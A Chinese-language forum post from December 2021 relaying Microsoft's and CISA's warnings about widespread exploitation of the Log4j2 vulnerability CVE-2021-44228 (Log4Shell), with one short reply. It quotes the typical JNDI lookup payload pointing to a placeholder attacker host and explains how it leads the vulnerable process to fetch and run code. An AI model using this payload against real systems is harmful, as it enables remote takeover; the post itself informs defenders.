查看: 1866|回复: 1
收起左侧

[IT业界] 微软警告比SolarWinds影响更深远的Log4j2漏洞利用

[复制链接]
蓝天二号
发表于 2021-12-16 11:27:05 | 显示全部楼层 |阅读模式
微软再次发出了来自具有深厚背景的黑客组织的网络攻击预警,可知问题源于 Java 日志库的 Log4j2 漏洞(CVE-2021-44228)。这家雷德蒙德科技巨头指出,世界多地的黑客已开始利用这项更复杂的日志协议技术,来远程访问受害者的设备。目前观察到的大部分攻击,主要涉及各路人马的大规模扫描。
92d4864c63ecc07.png
据悉,微软旗下的多个威胁情报团队 —— 包括 MSTIC 威胁情报中心、 Microsoft 365 Defender 威胁情报团队、RiskIQ 和 DART 检测响应团队 —— 一直在密切关注 Apache Log4j2 的远程代码执行(RCE)漏洞。
013f339f7374ea8.png
CVE-2021-44228 漏洞披露公告指出,被称作“Log4Shell”的漏洞攻击,往往在 Web 日志请求中包含如下字符串:

${jndi:ldap://[attacker site]/a}
646a97406f47b12.png
美国网络安全和基础设施安全局(CISA)也证实了微软的说法,此前该机构同样通报了 Log4Shell 漏洞的广泛利用。
5181472adb11dd0.png
CISA 负责人 Jen Easterly 于昨日接受 CNN 采访时重申,若不迅速采取补救措施,各个联邦机构的设备、服务、乃至整个互联网,都将处于一个相当可怕的境地。
392d85b4fe03030.png
微软警告称,Log4j2 的风险源于两个方面。其一是漏洞可被轻松利用,其二是基于其构建的产品数量 —— 而 Apache Log4j2 就是当前最流行的 Java 日志库之一。
f06cb7afd90a62e.jpg
据悉,日志库用于为开发者提供有关服务和产品的附加信息,允许其控制在应用程序执行期间、用户登录特定服务 / 设备的错误报告,并在遇到功能问题时收集相关数据。

通过日志库的使用,开发者还可深入了解或收集设备详情,包括 CPU 类型 / GPU 型号、驱动程序版本、以及系统内存等。

攻击者会对使用 Log4j2 生成日志的目标系统执行 HTTP 请求,该日志利用 JNDI 向攻击者控制的站点执行请求,最终导致被利用的进程访问站点并执行有效负载。

在许多观察到的案例中,攻击者往往拿到了 DNS 日志系统的参数,旨在记录对站点的请求、以对易受攻击的系统进行指纹识别。
77c134c4a42943a.png
此前已知的一种漏洞利用,涉及微软旗下的《我的世界》服务器。攻击者以聊天框作为中部署的消息内容作为管道,试图渗透用户系统并夺得控制权。

事实上,全球许多知名企业都面临着巨大的风险,其中不乏微软、Twitter、苹果、亚马逊、百度、Cloudflare、网易、Cloudflare 等科技巨头。

网络安全公司 Check Point 指出,截至目前,其 GitHub 项目的下载量已经超过 40 万次。遗憾的是,尽管 Apache 已经发布了一个修补程序,但各家公司的实施方案不尽相同。

对于数百上千万的客户来说,这意味着他们仍将在未来一段时间里面临 Log4j 入侵风险,或导致大量用户数据暴露于在外。
cnseatech
发表于 2021-12-16 12:30:54 | 显示全部楼层
应该叫太阳风暴而不是太阳风了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 22:40 , Processed in 0.151577 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表